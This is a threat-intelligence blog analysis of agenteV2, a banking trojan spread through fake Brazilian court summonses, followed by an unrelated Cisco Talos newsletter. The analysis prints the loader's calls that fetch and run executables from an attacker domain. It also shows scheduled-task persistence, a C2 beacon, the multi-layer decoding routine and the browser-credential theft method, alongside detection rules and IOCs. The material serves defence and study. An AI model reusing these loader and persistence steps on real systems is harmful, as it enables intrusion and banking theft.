A new phishing campaign targeting Brazilian users demonstrates how modern financial malware has evolved from simple credential theft into full-scale, operator-driven fraud platforms. Disguised as a judicial summons, this campaign leverages social engineering, multi-stage malware delivery, and real-time remote access capabilities to compromise victims and actively assist attackers in financial theft.  

For organizations, the implications extend beyond individual users. Employees accessing corporate systems, financial platforms, or crypto wallets from infected endpoints can unintentionally expose business-critical assets. The malware’s ability to stream screens, execute commands, and harvest credentials in real time makes it particularly dangerous for finance teams, executives, and organizations operating in or with Brazil. 

This is not just phishing. It’s a live intrusion channel into financial workflows. Technical analysis below.  

Attack Overview 

The malware at the heart of this campaign, agenteV2, functions as a full interactive backdoor. Once installed, it streams the victim’s screen to the attacker in real time, enabling live, operator-assisted financial fraud. A human operator watches the victim’s desktop session as it happens, waiting for a banking portal to open, and then takes direct control. 

The malware targets credentials and sessions at seven major Brazilian financial institutions — Itaú, Banco do Brasil, Caixa Econômica Federal, Bradesco, Santander, Inter, and Stone — as well as five major cryptocurrency wallet extensions. It also probes host systems for the presence of specialized Brazilian anti-fraud software (Diebold Warsaw, GbPlugin), indicating deliberate, well-researched targeting of the Brazilian financial ecosystem. 

Executive Summary 

1. This Is Live Financial Fraud, Not Passive Credential Theft. 

Business perspective: agenteV2 establishes a persistent WebSocket backdoor with live screen streaming and a remote shell. The attacker watches the victim’s screen in real time and acts manually the moment a banking session opens. Financial losses can occur within minutes of infection, before any traditional alert fires. 

Deploy ANY.RUN Interactive Sandbox to detonate suspicious email attachments in a live, controlled environment before they reach employee inboxes. 

2. The Lure Is Convincing Enough to Fool Security-Aware Staff. 

Business perspective: The phishing email impersonates a Brazilian federal court using a case number format indistinguishable from authentic CNJ court references. Even employees trained to spot phishing are likely to treat a realistic judicial summons as a high-priority communication requiring immediate action. 

Use ANY.RUN Threat Intelligence Lookup to check suspicious email sender domains, embedded URLs, and attachment hashes instantly against a continuously updated threat intelligence database. A 10-second lookup is sufficient to surface this campaign’s known indicators. 

3. The Malware Survives Reboots, IT Maintenance, and Password Resets. 

Business perspective: Three separate persistence mechanisms — two Scheduled Tasks at maximum privilege and a Registry Run key — ensure the malware remains operational across reboots, routine IT maintenance, and even password changes.  

ANY.RUN Threat Intelligence Feeds deliver structured IOCs directly into your SIEM and EDR for automated hunting across your entire endpoint fleet. Any host matching these indicators should be treated as actively compromised and isolated immediately. 

4. Blocking the Known C2 IP Is Not Enough. 

Business perspective: The malware reads its command-and-control server address from a public Pastebin page. The attacker can silently rotate to a new IP by editing a single page — without redeploying, recompiling, or redelivering any malware. IP blocklists become stale within hours of a C2 rotation. 

Replace IP-based blocking with behavior-based detection. The agenteV2 TLS client fingerprint (JA3 hash)) is stable across infrastructure rotations and can be deployed as a detection rule in your IDS/NDR/EDR. 

5. Traditional AV Will Not Catch This: Behavioral Analysis Is Required. 

Business perspective: The core stealer DLL is compiled from Python to native machine code with Nuitka — no bytecode is extractable and standard decompilers do not apply. Files are disguised with legitimate names (wifi_driver.exe, msedge04.exe) and the payload executes entirely in memory before touching disk.  

Behavioral sandbox analysis is the only reliable pre-execution detection method for Nuitka-compiled threats. The YARA rule in this report (Win_Stealer_AgenteV2_Nuitka) is deployable via ANY.RUN TI infrastructure for automated variant detection. 

Detailed Technical Analysis 

This attack was fully analyzed in ANY.RUN’s Interactive Sandbox, which provided full visibility into the multi-stage infection chain, process trees, network connections, API traces, and registry modifications in a live, controllable Windows 11 environment. 

View the phishing analysis session 

The threat actor operates a well-structured infrastructure spanning phishing delivery, staged payload distribution, a Pastebin-based dead-drop resolver, and a dedicated C2 server hosted on a bulletproof VPS provider in Germany. 

The final payload, internally named agenteV2, is a Python-based interactive Banking Trojan and Information Stealer whose core logic (agenteV2_historico_detect.dll) is compiled with Nuitka into native machine code.  

It is not a passive fire-and-forget stealer — it establishes a persistent WebSocket backdoor (uws://) enabling live screen streaming (PIL + mss), an interactive remote shell (subprocess.Popen dispatched via CMD:SHELL: parsing), and real-time operator control over the victim session. Persistence is achieved via Registry Run key and Scheduled Tasks (/rl highest), and a Pastebin dead-drop resolver enables rapid C2 rotation without redeployment. 

1. Initial Artifact Analysis 

1.1 Email lure (.eml) 

The campaign is delivered via email impersonating an official judicial summons from the Tribunal de Justiça do Distrito Federal (TJDF), referencing a fabricated civil conciliation hearing (case number 2194839-33.2026.8.07.1876). The case number format matches the authentic Brazilian CNJ numbering standard, increasing credibility. 

1.2 Social Engineering Mechanism 

The PDF attachment requires a password to open a technique to bypass email gateway sandboxes that cannot interact with password-protected documents. Upon ‘failing’ to open, the PDF instructs the victim to download a VBS file via a ‘click here’ link, attributing the error to a missing software component. This two-step friction is deliberate: it filters unengaged recipients and increases commitment of those who proceed. 

2. Infection Chain 

The full process tree and infection chain graph are visible in the sandbox detonation: WScript.exe → cmd.exe → schtasks + wifi_driver.exe execution flow:  

The processes include malware delivery, payload delivery, persistence establishment, and more:

3. Stage 1 VBScript Loader (0124_INTMACAO_.vbs) 

3.1. Runtime Behavior (API Trace) 

The following sequence was reconstructed from the ANY.RUN script API trace, showing the exact execution order of COM object calls: 

Phase 1 reiniciar.exe download and persistence (~13 seconds post-execution): 

IServerXMLHTTPRequest2.Open('GET', 'https://nuevaprodeciencia.club/br77b/arquivos/download/reiniciar.exe', False) 

IServerXMLHTTPRequest2.Send()                      -> HTTP 200 OK 

ADODB.Stream.Type = 1 (binary) 

ADODB.Stream.Write(ResponseBody)                   -> VT_ARRAY 

ADODB.Stream.SaveToFile('C:Program Files (x86)Wi-fireiniciar.exe', 2) 

IWshShell3.Run('cmd.exe /c schtasks /create /f /tn "RunAsAdmin_Executar" ...reiniciar.exe... /sc onlogon /rl highest', 0, False)

Phase 2 wifi_driver.exe download, persistence and initial beacon (~22–29 seconds): 

IServerXMLHTTPRequest2.Open('GET', 'https://nuevaprodeciencia.club/br77b/arquivos/download/msedge04.exe', False) 

IServerXMLHTTPRequest2.Send()                      -> HTTP 200 OK 

ADODB.Stream.SaveToFile('C:Program Files (x86)Wi-fiwifi_driver.exe', 2) 

IWshShell3.Run('"C:Program Files (x86)Wi-fiwifi_driver.exe"', 1, False)  // executed twice 

WScript.Sleep(3000) 

IWshShell3.Run('cmd.exe /c schtasks /create /f /tn "RunAsAdmin_AutoUpdate" ...wifi_driver.exe... /sc onlogon /rl highest', 0, False) 

IWshShell3.Run('https://nuevaprodeciencia.club/br77b/iayjaskyeiagds.php', 1, False)  // initial C2 beacon 

Key observations: 

• wifi_driver.exe is executed twice before Sleep(3000) retry mechanism to ensure process startup; 

• The server-side filename is msedge04.exe; it is saved locally as wifi_driver.exe deliberate renaming at download time; 

• The initial C2 beacon is fired by the VBS loader itself via IWshShell3.Run, before the payload’s own beaconing loop begins. 

3.2. Obfuscation & Payload Decoding Mechanism 

The VBS loader implements a multi-layer obfuscation pipeline that decodes and executes a secondary payload entirely in memory. Despite its apparent complexity, the mechanism is fully deterministic and reversible — all decoding logic, keys, and transformations are self-contained in the script, with no external dependencies or dynamic key generation. 

The two on-disk forms confirm runtime deobfuscation: 

C:UsersadminDownloads124_INTMACAO_.vbs          (16,739 bytes  — obfuscated, as delivered) 

C:UsersadminAppDataLocalTemp124_INTMACAO_.vbs (140,302 bytes — fully decoded runtime copy) 

The ~8.4x expansion factor is explained by the encoding pipeline described below. 

The encoded payload is stored as a large string built via repeated concatenation: 

tEXXKcvxSM = tEXXKcvxSM & "<chunk>" 

This pattern avoids signature-based detection of long static strings, prevents straightforward extraction, and obscures the actual payload size. It is a common technique in commodity VBS loaders. 

Three transformation functions are applied in sequence before the payload is executed: 

Step 1 — Triple Base64 Decoding. The function AqBVqmjYfY wraps the MSXML2.DOMDocument COM object to perform Base64 decoding. It is called three consecutive times, nesting the calls:

b = AqBVqmjYfY(AqBVqmjYfY(AqBVqmjYfY(b)))

Triple-encoding increases entropy and defeats naive single-pass decoders, but provides no cryptographic security — each layer is independently and trivially reversible. 

Step 2 — Hexadecimal Decoding. The function YnrbBGjUXH converts the Base64-decoded output from a hex-encoded byte stream into raw bytes: 

Chr(CInt("&H" & Mid(h, i, 2))) 

This confirms the intermediate payload is stored as a hex string, adding one further layer of visual obfuscation over the Base64 output. 

Step 3 — Custom Byte Transformation (Pseudo-Encryption). The function obmFYHGTeJ is the core obfuscation layer. It applies a Vigenere-like modular subtraction cipher using a hardcoded array of multiple keys: 

keys = Array("xsTqWN3wxwsA", "Bydpez94dTlZ", ...) 

For each byte, the routine iterates through all keys in reverse order and applies: 

ch = (ch - keyByte + 256) Mod 256 

This is similar to a repeated-key XOR/Vigenere cipher. It is not cryptographically secure — the keys are hardcoded in the script, the transformation is deterministic, and the decoding pipeline is fully reproducible offline. The critical weakness is that all key material is embedded in the script itself. 

After the three-stage decoding, the final payload is executed directly in memory without writing any intermediate artifact to disk: 

Execute obmFYHGTeJ(tEXXKcvxSM)

This fileless execution pattern means the next stage never touches the filesystem in decoded form, evading file-based AV scanning. The decoded payload can be recovered by inserting a logging hook at the Execute call or by running the decoding pipeline offline with the extracted keys. 

Overall assessment: the obfuscation chain is consistent with the use of publicly available VBS templates or tutorials. The layered approach demonstrates awareness of basic detection mechanisms but no understanding of cryptographic security. The presence of hardcoded keys and deterministic transformations makes full offline payload recovery straightforward for any analyst with access to the script. 

4. Stage 2 Payload Architecture 

The payload follows a two-component architecture: a lightweight container executable (wifi_driver.exe) and the actual malicious module (agenteV2_historico_detect.dll). These roles must not be confused only the DLL contains malicious logic. 

wifi_driver.exe Container/Bootloader 

wifi_driver.exe is a self-contained onefile bundle (PyInstaller or Nuitka container mode). It contains no malicious logic of its own. Its sole purpose is to: 

• Extract the full Python 3.13 runtime environment to a temporary directory (Temponefile_<PID>_<timestamp>); 

• Extract all required .pyd extensions and native DLLs alongside the runtime; 

• Load and execute agenteV2_historico_detect.dll the actual payload; 

• Clean up the extraction directory on exit.  

wifi_driver.exe is a self-contained onefile bundle (PyInstaller or Nuitka container mode). It contains no malicious logic of its own. Its sole purpose is to:

• Extract the full Python 3.13 runtime environment to a temporary directory (Temponefile_<PID>_<timestamp>);
• Extract all required .pyd extensions and native DLLs alongside the runtime;
• Load and execute agenteV2_historico_detect.dll the actual payload;
• Clean up the extraction directory on exit.

Reverse engineering path for wifi_driver.exe: 

• If PyInstaller: use pyinstxtractor.py to unpack the bundle → locate main.pyc (or file named after the executable) → decompile with pycdc to recover readable Python source; 

• If Nuitka container mode: the bootstrap code is minimal C focus effort on the extracted DLL, not the container; 

• The container itself is not the analytical target it is merely the delivery mechanism for the DLL. 

Extracted runtime components dropped to Temponefile_<PID> by wifi_driver.exe: 

agenteV2_historico_detect.dll Core Stealer (Nuitka) 

This DLL is the analytical target it contains all malicious logic. The original Python source was compiled with Nuitka (Python → C++ → native machine code), producing a monolithic 27 MB PE DLL with no extractable bytecode. pyinstxtractor and uncompyle6 do not apply here.

Despite robust Nuitka compilation, the threat actor failed to strip debug symbols, variable names, and cleartext strings from the binary exposing the full execution flow via static .rdata analysis. This is a recurring pattern in Brazilian malware: technically capable packaging decisions paired with poor operational security discipline. 
 
Core Capabilities (Reconstructed from Static + Dynamic Analysis):  

The malware does not hardcode the C2 address. It queries a Pastebin URL to dynamically retrieve the active C2 IP and port, enabling infrastructure rotation without redeployment: 

Dead-Drop URL:  https://pastebin.com/raw/0RmxqY57 
Resolved C2:    38.242.246.176:8443 

4.1. Persistent WebSocket Backdoor Interactive Agent 

Unlike typical stealers that perform a single HTTP POST exfiltration and terminate, agenteV2 establishes a persistent WebSocket connection (uws:// scheme) to the C2. This architecture enables real-time, bidirectional communication making it function as a full interactive backdoor rather than a passive stealer: 

• Continuous screen capture stream using PIL (Pillow) and mss libraries frames encoded as JPEG and streamed live to the operator; 

• Interactive remote shell via CMD:SHELL: command prefix commands dispatched through subprocess.Popen, output returned over the WebSocket; 

• Real-time telemetry: live operator visibility into the victim’s desktop session. 

This design is optimized for manual, real-time financial fraud. The operator can watch the victim’s screen, interact with open banking sessions, and issue commands on the fly. 

4.2. Evasive Browser Credential Harvesting 

The stealer targets all Chromium-based browsers (Chrome, Edge, Brave, Opera) across all user profiles. To bypass the SQLite file lock maintained by running browsers, it uses shutil.copyfile to duplicate the target database files into %TEMP% before executing SQL SELECT queries:  

Target files: Login Data, Cookies, History  

Method: shutil.copyfile(src, %TEMP%<random>) → sqlite3.connect(copy) → SELECT * FROM logins 

4.3. Security Controls & Anti-Fraud Enumeration 

The malware proactively profiles the host for regional anti-fraud and endpoint protection solutions before proceeding with credential theft a strong indicator of deliberate LATAM targeting: 

• Diebold Warsaw (Warsaw Security Module) disk path queries for this widely-deployed Brazilian banking security plugin; 

• GbPlugin disk path queries for this browser security plugin used by major Brazilian banks. 

Detection of these solutions likely influences the malware’s behavior (evasion, delayed execution, or alternate attack paths). 

4.4. Analyst Assessment 

agenteV2 is not a passive, fire-and-forget stealer. It is a purpose-built interactive agent designed for real-time manual financial fraud in the Brazilian market. The WebSocket architecture, live screen streaming, and remote shell capability are consistent with an operator-assisted attack flow: the threat actor watches the victim’s screen in real time, waits for a banking session to open, and interacts directly.  

The Nuitka compilation demonstrates meaningful anti-analysis effort; however, the failure to strip debug strings, variable names, and cleartext URLs reveals the full implementation to any analyst with access to the binary a significant OpSec failure that partially undermines the obfuscation investment. 

4.5. Persistence Mechanisms 

The payload establishes a third persistence layer independently of the VBS loader: 

Registry: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun 

Value: MonitorSystem 

Data: C:UsersadminAppDataLocalTempONEFIL~1agenteV2_historico_detect.py 

Note: the Registry Run value points to a .py file in %TEMP% this assumes either Python is installed and registered as a handler for .py files on the victim machine, or represents an implementation error by the threat actor (a common characteristic of amateur-but-functional malware). The name ‘MonitorSystem’ is social engineering for any victim who opens regedit. 

5. Stage 3 C2 Communication 

5.1. Dead-Drop Resolver via Pastebin 

agenteV2 does not hardcode the C2 IP. Instead, it implements a Pastebin-based dead-drop resolver allowing the threat actor to rotate C2 infrastructure without recompiling or redelivering the malware: 

The resolver (documented in DLL strings as ‘Busca IP e Porta Base do Pastebin. Retorna (ip, port) ou None’) parses the Pastebin content to extract the IP and port as a tuple, with explicit error handling for fetch failures and malformed content. 

5.2. Beacon Pattern 

5.3. TLS Fingerprints 

The JA3 hash (a48c0d5f95b1ef98f560f324fd275da1) can be used as a network detection rule it will match agenteV2’s TLS ClientHello regardless of C2 IP rotation. 

6. Threat Actor Infrastructure 

6.1. Infrastructure Map 

6.2. C2 Server Detail (Shodan) 

The Hestia Control Panel on port 8083 indicates the threat actor self-manages this server rather than using a hosting reseller. The presence of active SMTP ports alongside the C2 port strongly suggests this VPS serves as an all-in-one campaign platform: phishing email dispatch, payload hosting management, and C2 handling. 

Threat Actor Assessment 

Campaign Characteristics 

• Exclusively targeting Brazilian users Portuguese lure, CNJ court number format, Brazilian bank/fintech targeting, and enumeration of LATAM-specific anti-fraud tools (Diebold Warsaw, GbPlugin); 

• Judicial summons lure is a well-established social engineering technique in Brazil exploits fear of legal consequences to reduce victim scrutiny; 

• Per-victim unique tracking ID (?id=3df947b3) demonstrates the actor actively monitors individual infection progress; 

• WebSocket persistent backdoor with live screen streaming points to operator-assisted, manual fraud the threat actor watches victims’ screens in real time and waits for banking sessions to open; 

• Cloudflare Turnstile CAPTCHA on payload server deliberate anti-sandbox and anti-researcher measure; 

• Multi-step redirect chain before payload delivery adds anti-scraping friction; 

• ‘agenteV2’ naming implies active development a prior version (v1) likely exists or circulated previously; 

• Nuitka compilation of the core DLL represents a meaningful step above typical Brazilian stealer tradecraft; however, the failure to strip debug strings, variable names, and cleartext URLs is a significant OpSec failure that partially negates the obfuscation investment. 

Infrastructure Assessment 

• Two-tier delivery infrastructure (69[.]49.241[.]120 for phishing/payload, 38[.]242.246[.]176 for C2) separation reduces single-point takedown impact; 

• Pastebin dead-drop resolver is the primary C2 resilience mechanism actor can rotate C2 IPs by editing a single Pastebin page without touching deployed malware; 

• Active SMTP ports on C2 VPS strongly suggest self-hosted phishing email dispatch from the same server; 

• Hestia Control Panel indicates actor self-manages the VPS not a reseller customer; 

• Contabo GmbH (AS51167) is a known bulletproof-tolerant provider frequently abused by threat actors for affordable pricing and slow abuse response; 

• Implementation inconsistency (Registry Run value pointing to .py file) suggests the actor has strong Python development skills but limited operational security maturity.  

Detection & Response Recommendations 

1. Immediate Blocking 

• Block domains odaracani[.]online and nuevaprodeciencia[.]club at DNS/proxy/firewall; 

• Block IPs 69[.]49.241[.]120 and 38[.]242.246[.]176 at perimeter; 

• Add JA3 hash a48c0d5f95b1ef98f560f324fd275da1 as a network detection rule (IDS/NDR/EDR); 

• Block or alert on access to pastebin[.]com/raw/0RmxqY57 and request takedown of the page; 

• Deploy Suricata SIDs listed in section 6.6. 

2. SIEM Detection Rules 

• Alert: WScript.exe spawning cmd.exe with ‘schtasks’ + ‘/rl highest’ in command line; 

• Alert: Any process writing PE files to C:Program Files (x86)Wi-fi; 

• Alert: Scheduled Task creation with /rl highest by non-SYSTEM processes (Event ID 4698); 

• Alert: HKCURun key creation by non-installer processes; 

• Alert: ADODB.Stream + MSXML2.ServerXMLHTTP instantiated in the same WScript.exe process; 

• Alert: Outbound TLS connections to port 8443 from non-browser processes. 

3. YARA detection rule 

Use YARA rule search in TI Lookup:  

The rule: 

rule Win_Stealer_AgenteV2_Nuitka { 

meta: 

description = "Core Banker Stealer Nuitka Compiled" 

author = "0xOlympus" 

reference = "Analise de Campanha Judicial" 

date = "2026-03-19" 

severity = "Critical" 


strings: 

// Nuitka Artifcats 

$n1 = "NUITKA_PACKAGE_HOME" ascii 

$n2 = "__nuitka_binary_dir" ascii 

// Strings from report 

$s1 = "agenteV2_historico_detect.dll" ascii wide 

$s2 = "wifi_driver.exe" ascii wide 

$s3 = "reiniciar.exe" ascii wide 

// C2 protocol 

$c2 = "uws://" ascii 

condition: 

uint16(0) == 0x5A4D and (all of ($n*) and 2 of ($s*)) or ($c2) 

}

4. Incident Response Checklist 

Verify the presence of active compromise indicators:

schtasks /query /tn "RunAsAdmin_AutoUpdate" 

schtasks /query /tn "RunAsAdmin_Executar" 

reg query "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v MonitorSystem dir "C:Program Files (x86)Wi-fi" 

• Isolate affected host from network immediately upon detection; 

• Collect full memory dump of wifi_driver.exe and reiniciar.exe processes before terminating; 

• Hash all files in C:Program Files (x86)Wi-fi and compare against IOCs in section 6.1; 

• Assume all browser-saved credentials are compromised reset all banking, email, and crypto account passwords; 

• Review outbound TLS/8443 traffic in network logs for the past 30 days to assess exfiltration window; 

• Check browser extension integrity stealer may have modified or added extensions. 

5. Threat Intelligence: TI Feeds & TI Lookup 

Proactive intelligence on this campaign and similar threats can be operationalized using ANY.RUN’s Threat Intelligence suite: 

• ANY.RUN TI Lookup: Query all IOCs from this report (domains, IPs, file hashes, JA3 fingerprints) directly in TI Lookup to retrieve correlated sandbox verdicts, associated samples, C2 infrastructure mappings, and MITRE ATT&CK tagging across the ANY.RUN corpus. TI Lookup returns structured, analyst-ready context including first-seen/last-seen timestamps, related tasks, and artifact relationships — dramatically accelerating triage. 

• ANY.RUN TI Feeds: Subscribe to structured IOC feeds to push indicators from this campaign — and the broader Brazilian banking stealer ecosystem — directly into your SIEM, SOAR, EDR, or firewall. Feeds are updated continuously as new samples are analyzed in the sandbox, providing near-real-time coverage of emerging infrastructure and payload variants. 

• YARA Rules in TI Feeds: The Win_Stealer_AgenteV2_Nuitka YARA rule (section 9.3) can be deployed via ANY.RUN’s TI infrastructure to automatically flag new samples matching the Nuitka agenteV2 pattern as they surface in the wild. 

• Proactive Monitoring: Use TI Lookup to monitor the Pastebin dead-drop URL (pastebin.com/raw/0RmxqY57) and C2 IP (38.242.246.176) for updates — if the threat actor rotates infrastructure, ANY.RUN’s correlated sandbox data will surface the new indicators before they reach victim endpoints. 

The Business Case for ANY.RUN Enterprise 

Security decision-makers evaluating their defensive posture against threats like agenteV2 face three compounding problems: the attack surface is broad (any employee in Brazil is a potential victim), the time-to-fraud is measured in minutes (not days), and the attacker’s tooling actively resists the tools most organizations currently deploy. The question is not whether a more capable threat intelligence and analysis platform is needed. It is whether the cost of that platform is lower than the cost of a single successful fraud event. 

Based on the capabilities demonstrated in this campaign, the answer is unambiguous. A single successful agenteV2 infection gives an attacker live visibility into an employee’s banking session, the ability to issue commands through a remote shell, and persistence that survives the endpoint until it is explicitly cleaned. The financial exposure from a single operator-assisted fraud event, combined with the credential exfiltration across all browser profiles, will in most cases far exceed the annual cost of enterprise-grade behavioral analysis and threat intelligence. 

ANY.RUN Enterprise Suit addresses each failure mode this campaign is designed to exploit: 

• Before infection: Interactive Sandbox detonates suspicious email attachments, including password-protected PDFs, with analyst interaction in a fully instrumented Windows environment. The complete 11-stage attack chain surfaces in minutes, before any production endpoint is touched. 

• During triage: TI Lookup delivers instant, correlated intelligence on every IOC in this report (domains, IPs, file hashes, JA3 fingerprints) with MITRE ATT&CK mapping, first/last seen timestamps, and linked sandbox analyses. Triage that takes an analyst hours without context takes seconds with TI Lookup. 

• At scale and speed: TI Feeds push structured, continuously updated IOC streams directly into your SIEM, SOAR, EDR, and firewall, converting sandbox findings into blocking and detection rules automatically, across your entire environment, without analyst intervention per indicator. 

• Against evasion: Behavioral analysis in ANY.RUN’s sandbox is not defeated by Nuitka compilation, in-memory execution, or filename masquerading. It observes what the malware does, not what it looks like, making it structurally resistant to the obfuscation techniques this campaign relies on. 

• Against infrastructure rotation: The JA3 TLS fingerprint and behavioral YARA rule in this report remain valid even after the threat actor rotates their C2 IP. ANY.RUN’s TI infrastructure ensures these durable detection signals are operationalized immediately, not after the next campaign wave. 

The agenteV2 operators have invested meaningfully in their tooling. The organizations they target deserve to match that investment — with a platform built for the reality of modern, operator-assisted financial fraud rather than the commodity threats of five years ago. 

Conclusion 

This campaign is a vivid reminder that phishing has outgrown its old role as a simple delivery mechanism. It now acts as a gateway to interactive, real-time financial compromise, where attackers don’t just steal data, they participate in the victim’s actions like an invisible co-pilot with bad intentions. 

For businesses, the risk is no longer limited to credential leakage. When malware enables live screen monitoring, remote command execution, and direct interaction with financial sessions, the impact shifts to immediate financial loss, operational disruption, and reputational damage. Finance teams, executives, and any employees handling sensitive transactions become prime targets. 

Defending against this class of threats requires more than static detection. Organizations need visibility into behavior, speed in investigation, and context for decision-making. 

This is where a combined approach becomes critical: 

• Interactive Sandbox analysis helps teams understand exactly how a threat behaves before it spreads. 

• Threat Intelligence Feeds allow proactive blocking of known malicious infrastructure. 

• TI Lookup provides instant context, turning isolated indicators into actionable insight. 

Together, these capabilities transform security from reactive firefighting into controlled, informed response. 

In a landscape where attackers operate in real time, businesses must do the same.

About ANY.RUN   

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

Indicators of Compromise

1. File Hashes

Network IOCs

Malicious URLs

Host-Based IOCs

TLS / Network Fingerprints

IDS/IPS Signatures (Observed Suricata Alerts)

MITRE ATT&CK Mapping

FAQ

The post Inside agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Welcome to this week’s edition of the Threat Source newsletter. 

If I haven’t said it in a newsletter before, I’ll say it now: If you want to be good at cybersecurity, be a forever student. Cultivating and feeding your desire to know how things work is one of the key ingredients to being a hacker. It’s not always about understanding the micro details, but the macro of how systems work. And not just computers or software or networking systems — those are ecosystems we’re usually quite familiar with — but what about economics? agriculture? material sciences? human behavior? music and art? Do any of those carry any value into this profession? 

They damn sure do. Many, many times I have had to branch my technical research into domains that arbitrarily seem to provide no immediate value for technical problems. Learning how maritime insurance fraud works was interesting to me — and a short time later, led to cyber insurance and understanding how risk guides security investment in massive companies. Understanding international agriculture helped me research threat actor targeting and ransomware cartel victimology. 

One of the topics I’ve been researching heavily lately is economics, specifically industrial organization. It’s a branch of economics that studies how companies structure production, how markets form around them, and how costs operate at scale. For me, the natural target of my curiosity was Ford Motor Company. Henry Ford didn’t invent the car or the assembly line, but he was darn sure able to build and scale car production in a way that set the standard for all others in that space to emulate. I’ve learned about fixed vs. variable costs, how artisans had their knowledge crystalized within the assembly line process, and how and how amortized costs drove down prices, allowing the Ford Model T to exceed 900,000 units annually by the early 1920s. By that time, more than half of the registered automobiles in the world were Fords. Not half of American cars, half of all cars on Earth. 

So what? Well, what took Ford Motor Company 17 years to achieve in cost and ceiling reductions, the AI industry has done in 2.5 years. The rapid and massive influx of investments, fierce competition, and available compute has shown what industrial organization means in a world where AI now almost permeates everything we see and touch. What does this mean for AI replacing jobs? Are we the artisans who move to the frontier of security? What does this mean for enabling threat actors who can move up a step to threatening others with tools developed using an AI corpus already trained on security? There are lots of questions, and to be honest, the future isn’t clear here. One thing is for certain: We can look to the past to understand the future. Henry Ford said it best: “Progress happens when all the factors that make for it are ready, and then it is inevitable.” 

As much as we tend to be myopic as security professionals and focus on our tradecraft, we are all part of a series of interconnected systems that lets humanity function. Learning those systems — their quirks, their limitations, and their vulnerabilities — makes you a better hacker. Stay curious, friends. 

The one big thing 

Cisco Talos Incident Response (Talos IR) is sharing Q1 2026 incident response trends. Phishing has officially reclaimed its crown as the top initial access vector. In a notable first, responders observed adversaries leveraging Softr, an AI-powered web development tool, to rapidly generate credential-harvesting pages. Meanwhile, actual ransomware deployments hit absolute zero this quarter thanks to swift mitigation by Talos IR, though pre-ransomware activity accounted for 18% of engagements this quarter. 

Why do I care? 

The barrier to entry for cybercriminals is plummeting, and they are increasingly using our own tools against us. The use of AI platforms to spin up phishing infrastructure means even unsophisticated actors can launch high-speed, code-free attacks. Furthermore, threat actors are abusing legitimate developer tools like TruffleHog and native cloud APIs to quietly hunt for exposed secrets, making detection incredibly difficult for defenders already struggling with logging gaps. 

So now what? 

It’s time to get back to basics and lock down your perimeter. Organizations must implement properly configured multi-factor authentication (MFA), specifically restricting self-service enrollment to stop attackers from registering new devices. Defenders also need to prioritize robust patch management and ensure centralized logging via a SIEM is in place so forensic evidence remains intact. Read the full blog for a deeper dive into this quarter’s trends and adversary tactics. 

Top security headlines of the week 

Third U.S. security expert admits helping ransomware gang 
According to the Justice Department, Martino abused his role as a ransomware negotiator for five companies by providing the BlackCat/Alphv cybercrime group with information useful in negotiating a ransom payment. (SecurityWeek) 

22 BRIDGE:BREAK flaws expose thousands of Lantronix and Silex serial-to-IP converters 
Successful exploitation of the flaws could allow attackers to disrupt serial communications with field assets, conduct lateral movement, and tamper with sensor values or modify actuator behavior. (The Hacker News) 

How hackers “trojan-horsed” QEMU virtual machines to bypass security and drop ransomware 
In recent incidents, attackers used QEMU, an open-source machine emulator and virtualizer, to run hidden environments where malicious activity remained largely invisible to endpoint defenses and left minimal evidence on the host system. (TechRadar) 

Mastodon says its flagship server was hit by a DDoS attack 
The cyber attack targeting Mastodon comes days after Bluesky, another decentralized social network, resolved much of its days-long outagesfollowing a lengthy DDoS attack. (TechCrunch) 

Exploits turn Windows Defender into attacker tool 
Threat actors are using three publicly available proof-of-concept exploits (two are unpatched) to attack Microsoft Defender and turn the security platform’s primary cleanup and protection functions against organizations it is designed to protect. (Dark Reading) 

Can’t get enough Talos? 

Bad Apples: Weaponizing native macOS primitives for movement and execution 
Talos documented several macOS living-off-the-land (LOTL) techniques, demonstrating that native pathways for movement and execution remain accessible to those who understand the underlying architecture. 

AI phishing, fake CAPTCHA, and real-world cyber threat trends 
The Talos team breaks down findings from Q1 2026 — including phishing returning as the top initial access vector, and how attackers are using AI tools to build credential harvesting campaigns in almost no time at all. 

UAT-4356’s targeting of Cisco Firepower devices  
UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.” 

Upcoming events where you can find Talos 

• PIVOTcon (May 6 – 8) Málaga, Spain 
• OffensiveCon (May 15 – 16) Berlin, Germany 
• Cisco Live U.S. (May 31 – June 4) Las Vegas, Nevada 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Example Filename: VID001.exe 
Detection Name: Win.Worm.Coinminer::1201 

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
MD5: aac3165ece2959f39ff98334618d10d9 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974 
Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe 
Detection Name: W32.Injector:Gen.21ie.1201 

SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59 
Example Filename: APQ9305.dll 
Detection Name: Auto.90B145.282358.in02 

